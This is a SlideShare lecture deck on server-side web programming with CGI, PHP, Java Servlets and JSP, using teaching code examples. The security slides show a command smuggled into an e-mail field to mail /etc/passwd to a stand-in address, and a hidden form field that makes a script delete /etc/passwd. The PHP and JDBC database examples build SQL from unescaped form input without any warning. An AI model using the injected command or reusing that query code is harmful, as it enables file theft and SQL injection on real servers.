SlideShare ist ein Scribd-Unternehmen logo

Server-side Technologies: CGI, PHP, Java Servlets, JSP

G
ggunasagar

Slides serverside main

Technologie
1 von 95
Downloaden Sie, um offline zu lesen
Server-side Technologies CGI, PHP, Java Servlets, JSP Denis Helic
Server-side Technologies: Historical Background(1/3) Server-side = Web server side At the beginning the Web was a static information system Web servers served documents, images, etc. Static information stored on the server side (file system) No interaction between users and the Web (except browsing) (2/95)
Server-side Technologies: Historical Background(2/3) There was a need for more interaction between users and the system (e.g. phone books) HTML forms Server needed to respond differently depending on values submitted by users Dynamic response by server (3/95)
Server-side Technologies: Historical Background(3/3) Need to extend the functionality of Web servers Don’t add the new functionality into Web servers directly Just allow Web servers to communicate with external programs External programs generate dynamic content depending on values sub- mitted by HTML form Dynamic content forwarded to Web server Web server responds with dynamic content (4/95)
Server-side Technologies: Today More than just evaluating of HTML forms Dynamic content needed for: Sophisticated user interaction (e.g. search engines, shopping carts) Content changes often (e.g. weather forecast, news headlines) Web gateways to database-based applications (e.g. prices of products, online ticket reservations) (5/95)
Communication between Web server and external programs How should Web server communicate with external programs? Passing parameters, getting response, etc. Standardized communication mechanism Standard created by Web consortium (6/95)
Common Gateway Interface (CGI) CGI is a specification of communication between Web server and external programs Current version CGI 1.1 http://hoohoo.ncsa.uiuc.edu/cgi/interface.html Very general approach, can be applied for different applications Not only HTML form evaluation Web server must implement CGI specification All major Web servers do! (e.g. Apache, IIS, etc.) (7/95)
CGI Specification(1/4) Environment variables System specific variables set by Web server External program reads environment variables and obtains data about client request CONTENT_LENGTH, CONTENT_TYPE, REMOTE_ADDR, REMOTE_HOST, etc. Command line Using a special HTML tag user sends a command line to the server Command line executed on the server (8/95)
CGI Specification(2/4) Standard Input Used by the server to send client data to external program Standard Output Used by external program to send response to the server (write HTML to standard output) (9/95)
CGI Specification(3/4) HTTP method used by the client: GET or POST GET method: external program reads environment variables QUERY_STRING special environment variable containing data submit- ted by user (e.g. HTML form data) POST method: external program reads from standard input External program needs to parse the input (10/95)
CGI Specification(4/4) CGI specification allows external programs to be written in any program- ming language UNIX shell scripts, Perl scripts, C programs, C++ programs Even PHP as CGI or Java as CGI (11/95)
CGI Examples(1/7) Example 1: Hello World: CGI as UNIX shell script GET method, no parameters from client Write HTML to stdout #!/bin/sh # send http-header and a newline afterwards: echo "Content-Type: text/html" echo "" (12/95)
CGI Examples(2/7) Example 1 (continued): # send html content: echo "<HTML>" echo " <HEAD>" echo " <TITLE>Hello World CGI</TITLE>" echo " </HEAD>" echo " <BODY>" echo " Hello World (" date "+%T, %d.%m.%Y" echo ")" echo " </BODY>" echo "</HTML>" Example: http://coronet.iicm.edu:8080/cgi-bin/mmis/hello_world.sh (13/95)
CGI Examples(3/7) Example 2: Dump environment variables: CGI as Perl script GET method, no parameters from client Write HTML to stdout #!/usr/bin/perl require "cgi-lib.pl"; print &PrintHeader; print "<hr>"; print &PrintEnv; (14/95)
CGI Examples(4/7) Example 2 (continued): Example: http://coronet.iicm.edu:8080/cgi-bin/mmis/printenv.pl Special CGI library in Perl: cgi-lib Provides functions for parsing input, parsing parameters, writing headers, etc. cgi-lib homepage: http://cgi-lib.berkeley.edu/ (15/95)
CGI Examples(5/7) Example 3: Dump QUERY_STRING: CGI as Perl script GET method, with parameters from client Write HTML to stdout Parameters encoded in Url: http://coronet.iicm.edu:8080/cgi-bin/mmis/printenv.pl? action=search&sourceid=google&q=query Parameters forwarded as an environment variable (QUERY_STRING) to program special characters encoded by %’ and ASCII-value (hex) restricted to 1024 bytes! (16/95)
CGI Examples(6/7) Example 4: Evaluate HTML forms: CGI as Perl script POST method, with parameters from client, read from stdin Write HTML to stdout #!/usr/bin/perl require "cgi-lib.pl"; if (&ReadParse) { print &PrintHeader, &PrintVariables; } else { print &PrintHeader,’<form><input type="submit"> Data: <input name="myfield">’; } (17/95)
CGI Examples(7/7) Example 4 (continued): Example: http://coronet.iicm.edu:8080/mmis/examples/cgi/form.html <form action ="/cgi-bin/mmis/handle_form.pl" method ="POST" enctype= "multipart/form-data"> Another CGI example: http://www-scf.usc.edu/~csci351/Special/CGIinC/examples. html (18/95)
CGI Applications(1/2) Long list of different applications: Simple: Hit counters, current date, etc. Handling HTML forms, search engines, imagemaps, databases WWW gateways! (19/95)
CGI Applications(2/2) Finger gateway: http://coronet.iicm.edu:8080/cgi-bin/mmis/finger.pl Source: http://coronet.iicm.edu:8080/mmis/examples/cgi/ finger.pl Mail gateway: http://coronet.iicm.edu:8080/cgi-bin/mmis/mailto.pl Source: http://coronet.iicm.edu:8080/mmis/examples/cgi/ mailto.pl (20/95)
CGI Security Check parameters carefully!!! if($email =~ /[^a-zA-Z0-9_-.@]/){ $_ = "The email address should be of the form <i>user@server</i>!"; }else{ $_ = qx($finger $email); } Suppose this e-mail address: something ; mail bad@address.com < /etc/passwd Basically you let other people start programs on the server Check what they want to do on your server!!! Not only CGI! (PHP, Java Servlets, etc.) (21/95)
CGI - Perl Larry Wall: Practical Extraction and Reporting Language String manipulations, regular expressions Very powerful Strange syntax :-) (e.g. 1 while s/[(][^()]*[)]//;) Tutorials about perl/cgi: Chapter about CGI in SelfHTML: http://courses.iicm.edu/mmis/selfhtml80/cgiperl/ index.htm http://www.comp.leeds.ac.uk/nik/Cgi/start.html (22/95)
PHP: Hypertext Preprocessor http://www.php.net (NOT http://www.php.com = Parents helping Parents :-)) General purpose scripting language, especially suited for Web develop- ment PHP script can be embedded into HTML documents PHP script is interpreted on a Web server PHP interpreter used as a CGI-program PHP interpreter as a plug-in of a web-server (e.g. Apache module) (23/95)
PHP: Hello World(1/3) Embed PHP script into an HTML file Upload the file onto a Web server using extension .php Embedding PHP in HTML: < ? ... ? > <?php ... ?> <script language=”php”> ... </script> <% ... %> (24/95)
PHP: Hello World(2/3) Example: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Hello World</title> <meta http-equiv = "Content-type" content = "text/html; charset=iso-8859-1"> <link rel = "stylesheet" type = "text/css" href = "style.css"> </head> <body> <? echo "Hello World! "; echo "("; echo date ("l dS of F Y h:i:s A"); echo ")"; ?> </body> </html> (25/95)
PHP: Hello World(3/3) Example: http://coronet.iicm.edu:8080/mmis/examples/php/hello/ hello.php Source: http://coronet.iicm.edu:8080/mmis/examples/php/hello/ hello.phps (26/95)
PHP: Syntax PHP syntax close to C and Java Object-oriented approach Control structures Weakly-typed variables (prefix ’$’) Operators, etc. (27/95)
PHP: Applications Wide range of applications (similar to CGI) Forms handling, etc. Wide range of PHP libraries Network connectivity (e.g. access FTP, IMAP, SMTP, etc.) TU Webmail: https://sbox.tugraz.at/ Socket programming Database connectivity (e.g. MySQL, dBase, Oracle, etc.) XML/XSLT manipulation Image manipulation (28/95)
PHP: Handling Forms(1/8) PHP interpreter initializes variables correpsonding to form fields <form action ="/mmis/examples/php/env_vars/printvar.php" method="GET" enctype= "multipart/form-data"> Name: <input type = "text" name = "name" size = "20" maxlength = "50"> Second Name: <input type = "text" name = "second_name" size = "20" maxlength = "50"> Matrikel Number: <input type = "text" name = "nr" size = "20" maxlength = "50"> ... <input type = "submit" value = "Register"> </form> (29/95)
PHP: Handling Forms(2/8) PHP form variables: Alternative 1 PHP variables have same names as form fields $name for name, $nr for nr, etc. <?php echo "<table>n"; echo "<caption>Variables</caption>n"; echo "<tr><th>Key</th><th>Value</th></tr>n"; echo "<tr><td>Name</td><td>$name</td></tr>n"; echo "<tr><td>Second Name</td><td>$second_name</td></tr>n"; echo "<tr><td>Matrikel Number</td><td>$nr</td></tr>n"; echo "<tr><td>Study Field</td><td>$study_field</td></tr>n"; echo "</table>n"; ?> (30/95)
PHP: Handling Forms(3/8) Example with GET: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ var_get.html Example with POST: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ var_post.html Example PHP: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ printvar.php Source PHP: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ printvar.phps (31/95)
PHP: Handling Forms(4/8) PHP form variables: Alternative 2 Access form fields through PHP array $HTTP_POST_VARS for POST method $HTTP_GET_VARS for GET method $name = $HTTP_POST_VARS["name"]; ... $name = $HTTP_GET_VARS["name"]; (32/95)
PHP: Handling Forms(5/8) PHP form variables: Alternative 3 Access form fields through PHP array $_POST for POST method (>=PHP4.1.0) $_GET for GET method (>=PHP4.1.0) $name = $_POST["name"]; ... $name = $_GET["name"]; (33/95)
PHP: Handling Forms(6/8) Handling forms: Security issues Similar problems like with CGI We need to check parameters sent by users very carefully!!! PHP form variables: Alernative 1 Has a lot of security issues, since variables are globally defined (34/95)
PHP: Handling Forms(7/8) Example of security problem with global form variables $tempfile = "12345.tmp"; ... handle form variables ... ... do something with tempfile ... unlink($tempfile); (35/95)
PHP: Handling Forms(8/8) Example of security problem with global form variables (continued) Suppose a following HTML form: <input type = "hidden" name = "tempfile" value = "/etc/passwd"> php.ini: register_globals=Off!!! >=PHP4.2.0 by default off Use $HTTP_POST_VARS or $_POST instead (36/95)
PHP: Database Manipulation(1/5) Huge advantage of PHP: great support for database connectivity Adabas-D, mSQL, MySQL, Oracle, Postgres, Slid, Sybase/Sybase- CT, Velocis, dBase-Files, filePro-Dateien, ODBC, ...) Most notably: PHP/MySQL Advanced features: Persistent database connections Huge advantage over CGI for example! (37/95)
PHP: Database Manipulation(2/5) Example: Inserting and retrieving data from MySQL database Form: http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ form.html (38/95)
PHP: Database Manipulation(3/5) <?php $name = $HTTP_POST_VARS["name"]; $second_name = $HTTP_POST_VARS["second_name"]; $nr = $HTTP_POST_VARS["nr"]; $study_field = $HTTP_POST_VARS["study_field"]; ... mysql_connect() or die("Unable to connect to database server"); @mysql_select_db("$dbname") or die("Unable to select database"); ... $query = "INSERT INTO $tablename VALUES (’$name’, ’$second_name’, ’$nr’, ’$study_field’, ’null’)"; $result = mysql_query($query) or die (mysql_error()); ... mysql_close(); ?> (39/95)
PHP: Database Manipulation(4/5) Inserting data with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ register.phps Retrieving data with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ get_registered.php (40/95)
PHP: Database Manipulation(5/5) ... while($i < $rows){ $name = mysql_result($result, $i, "name"); $second_name = mysql_result($result, $i, "second_name"); $nr = mysql_result($result, $i, "nr"); $study_field = mysql_result($result, $i, "study_field"); ... echo "<tr><td>$name</td><td>$second_name</td><td>$nr</td><td> $i++; } ... Retrieving data with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ get_registered.phps (41/95)
PHP: XML Manipulation(1/3) Additional PHP library for manipulating XML data PEAR library: http://pear.php.net/ Packages for networking, scientific calculations, file system, databases, XML, XSLT, etc. XML_Tree one of the packages in the PEAR library (42/95)
PHP: XML Manipulation(2/3) header("Content-Type: text/xml"); include("XML/Tree.php"); $tree = new XML_Tree(); $root =& $tree->addRoot("Course"); ... while($i < $rows){ $reg =& $root->addChild("registered"); $student =& $reg->addChild("Student"); $name = mysql_result($result, $i, "name"); $student->addChild("name", $name); ... $i++; } ... $tree->dump(); (43/95)
PHP: XML Manipulation(3/3) Retrieving data (as XML) with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/xml/get_ registered.php Retrieving data (as XML) with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/xml/get_ registered.phps (44/95)
PHP: Image Manipulation(1/3) Generate not only HTML, but digital images as well! PHP compiled with GD graphical library Standard installation comes with some GD version GD Library: http://www.boutell.com/gd/ (45/95)
PHP: Image Manipulation(2/3) Header("Content-Type: image/png"); ... $im = ImageCreateTrueColor(400, 300); ... ImageFill($im, 0, 0, $white); ... ImageArc($im, 150, 150, $diameter, $diameter, $last_angle, ... ImageFillToBorder($im, $mid_x, $mid_y, $black, $colors[$z]); ... ImageFilledRectangle($im, 300, ($z - 1) * 30 + 10, 320, ($z - 1) * 30 + 20, $colors[$z]); ImageString($im, 5, 330, ($z - 1) * 30 + 10, $fields[$z], $black); ImagePNG($im); (46/95)
PHP: Image Manipulation(3/3) Retrieving data (as PNG image) with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/image/ get_stats.php Retrieving data (as PNG image) with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/image/ get_stats.phps (47/95)
PHP: Tutorials and Resources PHP Introductory Tutorial: http://www.php.net/tut.php PHP/MySQL Tutorial: http://hotwired.lycos.com/webmonkey/programming/php/ tutorials/tutorial4.html PHP for beginners: http://www.skyhome.de/php/ PHP4 - Webserver-Programmierung f¨r Einsteiger (book): u http://www.galileocomputing.de/openbook/php4/ Developer Resources http://www.devshed.com/Server_Side/PHP Datenbank, MySQL und PHP: http://ffm.junetz.de/members/reeg/DSP/ SelfPHP:http://www.selfphp.info/index.php. (48/95)
Java Servlets and Java Server Pages (JSP) Intro tutorial: http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Book: Marty Hall, Core Servlets and JavaServer Pages, Sun Press/Pren- tice Hall (http://www.coreservlets.com) Java servlets: server side Java applications Java server pages: Java code mixed into HTML Java applets: client-side applications (49/95)
Java Servlets Java technology’s answer to CGI programming Java programs that run on a Web server Java servlet engine (container) Official Reference Implementation: Apache Tomcat http://jakarta.apache.org/tomcat/index.html Current version: 5.5.4 (50/95)
Java Servlets: Advantages(1/4) Efficient With traditional CGI: for each request a new OS process is started Java VM, servlet container, and a particular servlet started only once: each request handled by a Java thread Lightweight Java threads instead of heavyweight OS processes With CGI: if N simultaneous requests than the code is loaded N times With servlets: N threads but only one copy of code in the memory Optimization possibilites with servlets: caching, keeping database connections open, etc. answer from CGI: Fast-CGI (http://www.fastcgi.com) (51/95)
Java Servlets: Advantages(2/4) Convinient If you already know Java (most probabaly you do ;)) Huge Java software libraries Libraries for handling cookies, sessions, etc. (52/95)
Java Servlets: Advantages(3/4) Powerful Java servlets can talk directly to the Web server (e.g. lookup for images stored in standard places) Servlets can share data among each other (e.g. database connection pools) Maintain information from request to request (e.g. session tracking, caching) (53/95)
Java Servlets: Advantages(4/4) Portable Written in Java with a standardized API Servlets written for Microsoft IIS will run on Apache and other Web servers All major Web servers support servlets (directly or via a plug-in) (54/95)
Installing Servlet Container(1/3) Servlet Container Tomcat http://jakarta.apache.org/tomcat/index.html Apache software foundation http://www.apache.org for others see http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Servlet-Tutorial-Setup.html (55/95)
Installing Servlet Container(2/3) installation tomcat # installation in verzeichnis ’/foo’ cd /foo unzip <path-to-tomcat-archive>/jakarta-tomcat-4.1.12.zip cd jakarta-tomcat-4.1.12 # start tomcat: bin/startup.sh # stop tomcat: bin/shutdown.sh tomcat: http://localhost:8080 or http://<hostname>:8080 (56/95)
Installing Servlet Container(3/3) Windows installation with Windows installer Installed as a Windows service Connecting with a Web server (e.g. Apache) Install a Web connector: http://jakarta.apache.org/tomcat/tomcat-4.1-doc/ config/connectors.html Configure Web server Set URL prefixes which will be passed to Tomcat (57/95)
Java Servlets - Internal(1/2) Java class extending abstract class javax.servlet.http.HttpServlet Implement public void doGet(request, response) to handle HTTP GET method Other methods (need not be implemented) e.g. public void doPost(request, response) (58/95)
Java Servlets - Internal(2/2) servlet template: import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class SomeServlet extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { // Use "request" to read incoming HTTP headers (e.g. cookies) // and HTML form data (e.g. data the user entered and submitted) // Use "response" to specify the HTTP response line and headers // (e.g. specifying the content type, setting cookies). PrintWriter out = response.getWriter(); // Use "out" to send content to browser } } (59/95)
Java Servlets: Hello World(1/5) Example: Hello World! ... public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ String hello = "Hello World"; response.setContentType("text/html"); PrintWriter writer = response.getWriter(); writer.println("<html>"); writer.println("t<head>"); writer.println( "tt<link rel = "stylesheet" type = "text/css" href = "style.css" writer.println("tt<title>" + hello + "</title>"); writer.println("t</head>"); writer.println("t<body>"); writer.println(hello + " (" + (new Date()) + ")"); writer.println("t</body>"); writer.println("</html>"); } ... (60/95)
Java Servlets: Hello World(2/5) Installing and running the HelloWorldServlet Tomcat web applications (in webapp directory) |-mmis-servlets | | | |-WEB-INF | | | |-web.xml | | | |-lib | | | | | |-*.jar | | | |-classes | | | | | |-*.class (61/95)
Java Servlets: Hello World(3/5) web.xml declares all servlets in a particular Web application <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> <web-app> <servlet> <servlet-name>Hello World Servlet</servlet-name> <description>Hello World from a Java servlet</description> <servlet-class>mmis.hello.HelloWorldServlet</servlet-class> </servlet> ... <servlet-mapping> <servlet-name>Hello World Servlet</servlet-name> <url-pattern>HelloWorld</url-pattern> </servlet-mapping> </web-app> (62/95)
Java Servlets: Hello World(4/5) Hello World: http://coronet.iicm.edu/mmis-servlets/HelloWorld Source code: http://coronet.iicm.edu/mmis/examples/java/hello/ HelloWorldServlet.java (63/95)
Java Servlets: Hello World(5/5) Element Construction Set (Apache project) http://jakarta.apache.org/ecs/ Supports generation of HTML and XML No need for numerous println statements Copy ecs.jar into lib directory! Hello World with ECS: http://coronet.iicm.edu/mmis-servlets/ECSHelloWorld Source code: http://coronet.iicm.edu/mmis/examples/java/hello/ ECSHelloWorldServlet.java (64/95)
Java Servlets: HTTP and Environment Variables(1/2) Similar communication mechanism between a Java servlet and the Web server All communication wrapped in a high-level Java objects (e.g. HttpServle- tRequest) request.getRemoteAddr() request.getRemoteHost() request.getRemoteUser() (65/95)
Java Servlets: HTTP and Environment Variables(2/2) CGI Variables: http://coronet.iicm.edu/mmis-servlets/CGIVar Source code: http://coronet.iicm.edu/mmis/examples/java/env/ CGIVarServlet.java HTTP Headers: http://coronet.iicm.edu/mmis-servlets/Header Source code: http://coronet.iicm.edu/mmis/examples/java/env/ HeaderServlet.java (66/95)
Java Servlets: Handling Forms(1/2) All form parsing done automatically Invoke a method on the instance of HttpServletRequest class to obtain parameters String name = request.getParameter("name"); (67/95)
Java Servlets: Handling Forms(2/2) Example with GET: http://coronet.iicm.edu/mmis/examples/java/form/form_ get.html Example with POST: http://coronet.iicm.edu/mmis/examples/java/form/form_ post.html Source code: http://coronet.iicm.edu/mmis/examples/java/form/ FormServlet.java (68/95)
Java Servlets: Database Manipulation(1/5) Advantage of Java: great support for database connectivity Similar to PHP Java Database Connectivity - JDBC http://java.sun.com/products/jdbc/index.html Drivers for many DBMS available For MySQL copy mysql-connector-java.jar into lib directory Advanced features: Persistent database connections Huge advantage over CGI! (69/95)
Java Servlets: Database Manipulation(2/5) Example: Inserting and retrieving data from MySQL database Form for inserting data: http://coronet.iicm.edu/mmis/examples/java/mysql/form. html (70/95)
Java Servlets: Database Manipulation(3/5) Connection connection = DriverManager.getConnection( "jdbc:mysql://" + dbms_host_ + "/" + dbms_db_, dbms_username_, dbms_password_); Statement statement = connection.createStatement(); int row = statement.executeUpdate( "INSERT INTO " + dbms_db_table_ + " VALUES(’" + name + "’,’" + second_name + "’,’" + nr + "’,’" + study_field + "’,’null’)"); Inserting data with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ RegisterStudentServlet.java (71/95)
Java Servlets: Database Manipulation(4/5) Retrieving data with Java Connection connection = DriverManager.getConnection(...); Statement statement = connection.createStatement(); ResultSet result = statement.executeQuery( "SELECT * FROM " + dbms_db_table_); ... while(result.next()){ String name = result.getString("name"); ... TR table_row = new TR(true); table_row.addElement((new TD(true)).addElement(name)); ... } (72/95)
Java Servlets: Database Manipulation(5/5) Retrieving data with Java http://coronet.iicm.edu/mmis-servlets/Registration Retrieving data with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ RegistrationServlet.java (73/95)
Java Servlets: XML Manipulation(1/2) Java SE 1.4+ includes library for manipulating XML data Element root = document.createElement("Course"); document.appendChild(root); ... Connection connection = DriverManager.getConnection(...); Statement statement = connection.createStatement(); ResultSet result = statement.executeQuery("SELECT * FROM " + dbm while(result.next()){ String name = result.getString("name"); Element el_name = document.createElement("name"); Text name_text = document.createTextNode(name); el_name.appendChild(name_text); student.appendChild(el_name); } (74/95)
Java Servlets: XML Manipulation(2/2) Retrieving data (as XML) with Java: http://coronet.iicm.edu/mmis-servlets/XMLRegistration Retrieving data (as XML) with Java (source): http://coronet.iicm.edu/mmis/examples/java/mysql/ XMLRegistrationServlet.java (75/95)
Java Servlets: Tutorials and Resources Java Servlets Introductory Tutorial: http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Book: Marty Hall, Core Servlets and JavaServer Pages, Sun Press/Pren- tice Hall (http://www.coreservlets.com) JDBC Tutorial: http://java.sun.com/docs/books/tutorial/jdbc/index.html Developer Library (includes form multipart parser) http://www.servlets.com/cos/index.html Developers Resources http://www.servlets.com/index.tea (76/95)
Java Server Pages (JSP) Combine static HTML with Java Code <HTML> <HEAD> <TITLE>JSP-Hello World</TITLE> </HEAD> <BODY> Static Hello World<BR> <% out.print("Dynamic Hello World :-)<br>"); %> </BODY> </HTML> HelloWorld JSP: http://coronet.iicm.edu/mmis-servlets/jsp/helloworld.jsp (77/95)
Java Server Pages (JSP) - Internal JSP pages are converted to Java classes <tomcat-dir>/work/localhost/helloworld$jsp.java classname: helloworld$jsp: [...] public void _jspService(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { [...] response.setContentType("text/html;charset=8859_1"); [...] out.write("<HTML>rn <HEAD>rn <TITLE>JSP-Hello World</TITLE>rn </HEAD>rn <BODY>rn"); [...] } [...] (78/95)
JSP Elements(1/7) JSP expression <%= "Hello World <BR>" %> XML syntax: <jsp:expression> "HelloWorld<BR>" </jsp:expression> JSP expression evaluated and printed out! (79/95)
JSP Elements(2/7) JSP Scriplet <% out.print("Hello World <BR>"); %> XML syntax: <jsp:scriptlet> out.print("HelloWorld<BR>"); </jsp:scriptlet> JSP scriplet code is inserted into the service method and executed Combining JSP scriplet and JSP expression: <% String hello2 = "Hello World <BR>"; %> <%= hello2 %> (80/95)
JSP Elements(3/7) JSP Declaration <%! private int access_count = 0; %> XML syntax: <jsp:declaration> privateintaccess_count=0 </jsp:declaration> JSP declaration code is inserted outside the service method (81/95)
JSP Elements(4/7) JSP Page Directive <%@ page import = "java.util.*" %> XML syntax: <jsp:directive.page import=”java.util.∗”/> Directions to the servlet engine about general page setup import, session, buffer, mimeType, etc. (82/95)
JSP Elements(5/7) JSP comments JSP Include Directive (includes other files at run-time) JSP Elements to handle Java Beans (83/95)
JSP Elements(6/7) JSP predefined variables request, response out session config, pageContext (84/95)
JSP Elements(7/7) Example: http://coronet.iicm.edu/mmis-servlets/jsp/example.jsp Example: http://coronet.iicm.edu/mmis-servlets/jsp/example.jsp? data=submited Source: http://coronet.iicm.edu/mmis-servlets/jsp/example.jsp. txt (85/95)
Servlets, CGI, JSP, PHP, ... - Problems!(1/3) Common problems of all server-side generated Web applications Mixing of content and presentation Hard to decouple this in scripting languages Script always embeded inside HTML code (86/95)
Servlets, CGI, JSP, PHP, ... - Problems!(2/3) Servlets have this problem also Presentation designer needs to program in Java Possible solution Dump content as XML, appply XSLT (87/95)
Servlets, CGI, JSP, PHP, ... - Problems!(3/3) Java Web Frameworks try to solve this problem Coocon (XML Publishing framework) http://xml.apache.org/cocoon/index.html Struts http://jakarta.apache.org/struts/index.html More on Java Web Frameworks in MMIS 2 (88/95)
Servlets, CGI, JSP, PHP, ... - What to take? Depends on application requirements (e.g. database connectivity, perfor- mance, etc.) Depends on know-how, taste, etc. Depends on how dynamic is Web application Less dynamic content - JSP, PHP, etc. Gateway to existing Java application (more dynamic content) - Java servlets (89/95)
Session Tracking(1/5) HTTP is connection-less: one connection per request Information about user/session is lost whenever the connection is closed Often necessary to keep track about the session (e.g. online shop) (90/95)
Session Tracking(2/5) Keep track with: Cookies Hidden form fields: <INPUT type=”HIDDEN”name=”sessionInfo”value=”username”> Url-rewriting: e.g. http://coronet.iicm.edu/mmis-servlets/Session; jsessionid=34D53231C1140018A422F540E9379927 (91/95)
Session Tracking(3/5) Cookies Strings sent from server to Web browser Stored on a client side database, files or in memory Sent back from browser to the Web server in HTTP-header (92/95)
Session Tracking(4/5) Used to store the state of communication between a client and the server Server sets the read rigths for a cookie (i.e. who can read the cookie) Commercial sites use cookies to create user profiles (e.g. Ad-ware) Possible to switch off (by request, none at all, ...) (93/95)
Session Tracking(5/5) High level interfaces in PHP, Java Servlets API Java servlets API manages sessions with cookies or url rewriting Transparent to programmer Session example: http://coronet.iicm.edu/mmis-servlets/Session Session example (source): http://coronet.iicm.edu/mmis/examples/java/session/ SessionServlet.java (94/95)
Distributed Programming on the Web Very hot topic right now .NET from Microsoft Web services More on Web services in MMIS 2 (95/95)

Empfohlen

Fm 2
Fm 2Fm 2
Fm 2sambavade
 
Python cgi programming
Python cgi programmingPython cgi programming
Python cgi programmingSmt. Indira Gandhi College of Engineering, Navi Mumbai, Mumbai
 
Common Gateway Interface
Common Gateway InterfaceCommon Gateway Interface
Common Gateway InterfacePiero Fraternali
 
Common gateway interface
Common gateway interfaceCommon gateway interface
Common gateway interfaceAnandita
 
Common Gateway Interface ppt
Common Gateway Interface pptCommon Gateway Interface ppt
Common Gateway Interface pptOECLIB Odisha Electronics Control Library
 
Cgi
CgiCgi
CgiGirish Srivastava
 
CGI Presentation
CGI PresentationCGI Presentation
CGI PresentationSopan Shewale
 
Cgi
CgiCgi
CgiAbhishek Kesharwani
 

Empfohlen

Fm 2
Fm 2Fm 2
Fm 2sambavade
 
Python cgi programming
Python cgi programmingPython cgi programming
Python cgi programmingSmt. Indira Gandhi College of Engineering, Navi Mumbai, Mumbai
 
Common Gateway Interface
Common Gateway InterfaceCommon Gateway Interface
Common Gateway InterfacePiero Fraternali
 
Common gateway interface
Common gateway interfaceCommon gateway interface
Common gateway interfaceAnandita
 
Common Gateway Interface ppt
Common Gateway Interface pptCommon Gateway Interface ppt
Common Gateway Interface pptOECLIB Odisha Electronics Control Library
 
Cgi
CgiCgi
CgiGirish Srivastava
 
CGI Presentation
CGI PresentationCGI Presentation
CGI PresentationSopan Shewale
 
Cgi
CgiCgi
CgiAbhishek Kesharwani
 
Web server
Web serverWeb server
Web serverSujeet Kumar Singh
 
Cgi
CgiCgi
CgiDEEPIKA KAMBOJ
 
CGI Introduction
CGI IntroductionCGI Introduction
CGI IntroductionChaffey College
 
Dynamic Web Programming
Dynamic Web ProgrammingDynamic Web Programming
Dynamic Web ProgrammingInformation Technology
 
Introduction About PHP
Introduction About PHP Introduction About PHP
Introduction About PHPSoftware company
 
Http request&response
Http request&responseHttp request&response
Http request&responseAswin Krishnamoorthy
 
HTTP
HTTPHTTP
HTTPDaniel Kummer
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323Sleepy Head
 
XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)Peter R. Egli
 
HTTP
HTTPHTTP
HTTPMaeEstherMaguadMaralit
 
Web technologies: HTTP
Web technologies: HTTPWeb technologies: HTTP
Web technologies: HTTPPiero Fraternali
 
Edp bootstrapping a-software_company
Edp bootstrapping a-software_companyEdp bootstrapping a-software_company
Edp bootstrapping a-software_companyGanesh Kulkarni
 
Web-GIS used to support and strengthen Environmental and Social Management Pl...
Web-GIS used to support and strengthen Environmental and Social Management Pl...Web-GIS used to support and strengthen Environmental and Social Management Pl...
Web-GIS used to support and strengthen Environmental and Social Management Pl...Association for Geographic Information (AGI)
 
Inaugural Addresses
Inaugural AddressesInaugural Addresses
Inaugural AddressesBooz Allen Hamilton
 
How to think like a startup
How to think like a startupHow to think like a startup
How to think like a startupLoic Le Meur
 
Teaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakTeaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakShelly Sanchez Terrell
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerLuminary Labs
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsLinkedIn
 
CGI by rj
CGI by rjCGI by rj
CGI by rjShree M.L.Kakadiya MCA mahila college, Amreli
 
Unit 02: Web Technologies (2/2)
Unit 02: Web Technologies (2/2)Unit 02: Web Technologies (2/2)
Unit 02: Web Technologies (2/2)DSBW 2011/2002 - Carles Farré - Barcelona Tech
 
PPT
PPTPPT
PPTwebhostingguy
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.pptRonakBothra8
 

Weitere ähnliche Inhalte

Was ist angesagt?

XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)Peter R. Egli
 
Edp bootstrapping a-software_company
Edp bootstrapping a-software_companyEdp bootstrapping a-software_company
Edp bootstrapping a-software_companyGanesh Kulkarni
 

Was ist angesagt? (12)

Web server
Web serverWeb server
Web server
 
Cgi
CgiCgi
Cgi
 
CGI Introduction
CGI IntroductionCGI Introduction
CGI Introduction
 
Dynamic Web Programming
Dynamic Web ProgrammingDynamic Web Programming
Dynamic Web Programming
 
Introduction About PHP
